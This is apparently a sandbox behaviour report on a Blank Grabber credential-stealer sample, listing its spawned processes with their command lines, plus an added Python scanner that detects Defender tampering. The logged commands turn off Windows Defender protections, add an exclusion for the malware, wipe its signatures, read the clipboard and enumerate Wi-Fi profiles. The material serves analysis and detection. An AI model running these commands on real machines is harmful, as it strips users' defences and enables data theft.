                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\HeilHitler.exe"
                                                                                                                                                                                                                                          Imagebase:0x7ff633d60000
                                                                                                                                                                                                                                          File size:6'251'402 bytes
                                                                                                                                                                                                                                          MD5 hash:AEAB677EDFB0B7838AD440C071A04965
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1680543056.0000028B92082000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1680543056.0000028B92084000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                          Start time:04:44:01
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\HeilHitler.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\HeilHitler.exe"
                                                                                                                                                                                                                                          Imagebase:0x7ff633d60000
                                                                                                                                                                                                                                          File size:6'251'402 bytes
                                                                                                                                                                                                                                          MD5 hash:AEAB677EDFB0B7838AD440C071A04965
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2017807345.000001BD43E2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                          Start time:04:44:03
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:04:44:03
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase: 0x7ff602d80000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 04:44:03
Start date: 15/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 04:44:03
Start date: 15/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 04:44:04
Start date: 15/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 04:44:04
Start date: 15/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
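
Detection logic for the Defender-tampering command lines recorded in Target IDs 3, 6 and 7 above, as an added example that is not part of this report or of the sample's code: a small Python scanner that runs a few hand-written rules over process-creation command lines and reports which Defender protections each one turns off. The events, rule names and PIDs are constructed for the example; the regexes approximate the Sigma detections listed under Signatures ("Powershell Defender Disable Scan Feature", "Powershell Base64 Encoded MpPreference Cmdlet") rather than reproducing them, and they run over the whole command line so that the three chained actions in the single cmd.exe invocation of Target ID 3 are all caught. The numeric value 2 for -SubmitSamplesConsent is the enum value of NeverSend, which is why the second powershell call is treated as the same tampering.

```python
"""Flag Windows Defender tampering in process-creation command lines.

Added example for this report, not code from Joe Sandbox or from the sample.
The rules approximate the behaviours the report flags (Set-MpPreference
disabling protections, Add-MpPreference exclusions, MpCmdRun -RemoveDefinitions);
the events are constructed from the report's command lines, with invented PIDs.
"""
import re

# Constructed sample events modelled on this report's process list, plus one
# benign re-enable command (pid 99) that must not fire.
SAMPLE_EVENTS = [
    {"pid": 3, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference '
                r'-DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true '
                r'-DisableRealtimeMonitoring $true -DisableScriptScanning $true '
                r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode '
                r'-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && '
                r'powershell Set-MpPreference -SubmitSamplesConsent 2 & '
                r'"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"'},
    {"pid": 6, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'"},
    {"pid": 12, "image": r"C:\Windows\System32\tasklist.exe",
     "cmdline": "tasklist /FO LIST"},
    {"pid": 99, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $false"},
]

# (rule name, pattern). Case-insensitive because cmdlet names and parameters are.
RULES = [
    # Any -Disable<Feature> $true switch on Set-MpPreference.
    ("defender_feature_disabled",
     re.compile(r"set-mppreference\b.*-disable\w+\s+\$true", re.I)),
    # Cloud reporting (MAPS) or sample submission switched off; 2 == NeverSend.
    ("defender_cloud_reporting_off",
     re.compile(r"set-mppreference\b.*(-mapsreporting\s+(disabled|0)\b"
                r"|-submitsamplesconsent\s+(neversend|2)\b)", re.I)),
    ("controlled_folder_access_off",
     re.compile(r"set-mppreference\b.*-enablecontrolledfolderaccess\s+disabled\b", re.I)),
    # Exclusion added for a path, process or extension.
    ("defender_exclusion_added",
     re.compile(r"add-mppreference\b.*-exclusion(path|process|extension)\b", re.I)),
    # Signature database removed with MpCmdRun.
    ("defender_signatures_removed",
     re.compile(r"mpcmdrun(\.exe)?\b.*-removedefinitions\b", re.I)),
]

DISABLE_SWITCH = re.compile(r"-(Disable\w+)\s+\$true", re.I)


def disabled_features(cmdline):
    """Names of the -Disable* switches set to $true, e.g. ['DisableRealtimeMonitoring']."""
    return sorted({m.group(1) for m in DISABLE_SWITCH.finditer(cmdline)}, key=str.lower)


def scan_event(event):
    """Detection record for one event, or None when no rule matched."""
    hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
    if not hits:
        return None
    return {"pid": event["pid"], "image": event["image"], "rules": hits,
            "disabled": disabled_features(event["cmdline"])}


def scan_events(events):
    """Run every rule over every event and keep only the events that fired."""
    return [rec for rec in map(scan_event, events) if rec]


if __name__ == "__main__":
    for rec in scan_events(SAMPLE_EVENTS):
        print(f"pid {rec['pid']} {rec['image']}: {', '.join(rec['rules'])}")
        if rec["disabled"]:
            print("    disabled:", ", ".join(rec["disabled"]))
```

On a real host the records would come from Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled; a matching event is the cue to pull Get-MpPreference on the endpoint and compare its exclusion lists and Disable* values against the baseline, because the sandbox shows these changes succeeding under an elevated token.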

Target ID: 8
Start time: 04:44:05
Start date: 15/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase: 0x7ff602d80000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 04:44:05
Start date: 15/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase: 0x7ff602d80000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 04:44:05
Start date: 15/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 04:44:05
Start date: 15/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 04:44:05
Start date: 15/11/2024
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist /FO LIST
Imagebase: 0x7ff73a600000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                          Start time:04:44:05
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                          Imagebase:0x7ff73a600000
                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                          Start time:04:44:06
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                          Start time:04:44:06
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                          Start time:04:44:06
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                          Start time:04:44:06
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                          Start time:04:44:07
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                          Start time:04:44:07
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                          Start time:04:44:07
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                          Imagebase:0x7ff73a600000
                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:21
Start time:04:44:07
Start date:15/11/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:0x7ff7374d0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:04:44:07
Start date:15/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Get-Clipboard
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:04:44:08
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:04:44:08
Start date:15/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:04:44:08
Start date:15/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff7f6760000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:04:44:09
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:04:44:09
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:04:44:09
Start date:15/11/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff693ab0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:04:44:10
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:04:44:10
Start date:15/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:0x7ff602d80000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:04:44:10
Start date:15/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                                                                                                          Imagebase:0x7ff7f6760000
                                                                                                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:systeminfo
                                                                                                                                                                                                                                          Imagebase:0x7ff7458c0000
                                                                                                                                                                                                                                          File size:110'080 bytes
                                                                                                                                                                                                                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:netsh wlan show profile
                                                                                                                                                                                                                                          Imagebase:0x7ff6a29c0000
                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:04:44:10
Start date:15/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
